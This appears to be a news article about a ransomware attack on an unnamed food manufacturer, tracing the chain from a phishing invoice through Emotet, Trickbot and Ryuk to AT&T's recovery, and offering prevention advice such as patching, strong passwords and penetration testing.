By taking advantage of common security vulnerabilities crooks almost got a big payday as a food and drink manufacturer fell victim to a ransomware attack.  But crucially the targeted ransomware potential victim, didn’t give in to the extortion demand.

The security experts have given some insights into just what happened to the unnamed business as attackers took down the network. 

Firstly, the crooks used a phishing attack.

Secondly, they were able to take advantage of a couple of vulnerabilities such as;

  1. Old hardware
  2. Default passwords

This allowed them to deploy

  1. Emotet and Trickbot malware before delivering the 
  2. Ryuk ransomware 

and attempting to extort a fee from the victim to restore the network.

Subsequently, the organisation decided against paying the ransom money. But chose instead to hire the security experts. They came in and examined the network restoring it to functionality within just 48 hours.

Bindu Sundaresan, the Strategic Security Solutions Practice Lead at AT&T cybersecurity confirmed “it was a targeted attack.” Explaining that in the case of this particular- organisation as with many, they don’t have a security retainer or IT staff. So, the common response is “give into the ransomware attack because they want to return their operations quickly.”

AT&T were the cybersecurity company that came in and investigated the attack. Most importantly and thankfully their expertise helped the manufacturer get back online without the big cash payout and with minimal disruption to production time. However, it could have all been potentially averted. That’s if the basic security vulnerabilities hadn’t allowed the initial stages of the attack to happen.

To clarify, Ryuk which is a ransomware is only deployed at the last stage of a three-pronged attack. The other two prongs are Emotet and Trickbot.

Emotet began as a banking trojan before progressing into a botnet that is unleashed to send other malware, Trickbot trojan, in this case.

As said Trickbot is a malware. As a result, it’s capable of allowing entry to compromised systems through a backdoor for these attackers. During which Trickbots have-the ability to move around the networks, issues commands and steal additional data. It’s a powerful form of malware.

After that the criminals download the Ryuk ransomware on to the network. Certainly the hackers know it’s the quickest and easiest way to make money from a compromised network.

It’s most important to recognise that this attack started with a phishing attack while other ransomware campaigns start with targeting remote ports. If this was recognised initially, there may have been an avoidance of having had this happen at all.

To clarify this, Sundaresan goes on to explain that “a user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document then malicious code executed a PowerShell command that downloaded an Emotet payload.” To note a PowerShell command aren’t needed by users who don’t need administrator rights, as a rule. That’s to say if PowerShell had been disabled for this user, the attack could have been stopped in its tracks at very this point.

Firstly, Emotet gained entry and a foothold into the network. Forming the initial stage of the attack. Secondly, the next step was to use the TrickBot. This malware steals login credentials for corporate accounts and cloud services to gain access to other parts of the network.

Just by using these two steps, the Emotet and TrickBot attacks, cyber criminals have already gained control of over half the network.

Lastly, the nail in the coffin is delivered, the Ryuk ransomware.

Sundaresan, goes on to say that “malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it’s costing to their network. Firstly because of “the valuable data that’s being held. And secondly, they want to get back to work. “So, they have a sense of urgency”

Above all, in this case and thankfully the Ryuk had compromised only about 60% network that included the ordering and the billing applications. So, it could have been much- much, worse. In part this was due to fact that the unnamed manufacturer brought in the security experts to contain the attack.

Sundaresan explains that “the ability to contain it and the response time are vital, it really is the key to a quick recovery.”

AT&T had contained it enough, not to get to the crucial databases, so they were able to get the business back up and running within 48 hours. And that’s without paying any large cash amounts to the criminals. Good news!

But let’s think firstly, 2 days offline would have still cost the organisation money. Secondly, getting in the security experts would have cost them a fee as well. In addition, the manufacturer has to think about security upgrades to their network, so they have more protection in future. They don’t want to be attacked again. And so there’s more money again.

On the other hand, they probably would have needed to upgrade their security anyway. This manufacturing company could’ve prevented itself from falling victim to ransomware by ensuring that their cybersecurity was managed well. Sometimes all it takes is a few simple-to-fix vulnerabilities that can stop the attack. Small protections so that criminals can’t take advantage of.

For instance, there are organisations that still haven’t applied security updates. Some of these critical security updates have been known for a long time. These types of vulnerabilities are the ones that Emotet, Trickbot and Ryuk take advantage of, they’re easy to exploit.

Most importantly, as Sundaresan says, even though Microsoft has put out patches, patch management, security measures still continue to be areas of concern within some organisations. Secondly, if strong passwords and multi-factor authentication were used to secure systems “this ransomware attack could’ve also been prevented.”

She says “a lot of this can be prevented. If they didn’t have default password and end-of-life machines, a lot of this would’ve been prevented.”

Adding that prevention is the best cure when it comes to cyberattacks, and the most cost effective in the long run. These are a few of the benefits:

  1. it stops your organisation from falling victim to ransomware or other malware in the first place
  2. the cost of securing the network in advance is almost certainly going to be less expensive than having to do it in the aftermath of an incident.

An incident: 

  1. disrupts operations 
  2. causes reputational damage that could keep customers away.
  3. could cost a large cash payday

In other words, the cost to secure your network and data by the experts might seem expensive but it’s worth it. Definitely- worth getting the experts in to examine the network before an incident rather than after one. In this case we know it could have been so much worse.

Sundaresan recommends;

Firstly, to get a security assessment done

“security initiatives from compliance or internal testing – it’s not enough”, she says.

Secondly, get your network tested 

She also highlights the need to “use multiple attack vectors in order to do it objectively with full penetration testing.

Above all, ransomware will remain a problem whether it’s Ryuk or called something else, if organisations aren’t putting in place some basic security measures. The threat will still be ongoing if inaction is taken when it comes to security.

Gone are the days of thinking an incident won’t happen to me with too many organisations having fallen victim to a hacker’s criminal efforts. This time it was good that the criminals didn’t get away with the loot. But it could have been worse.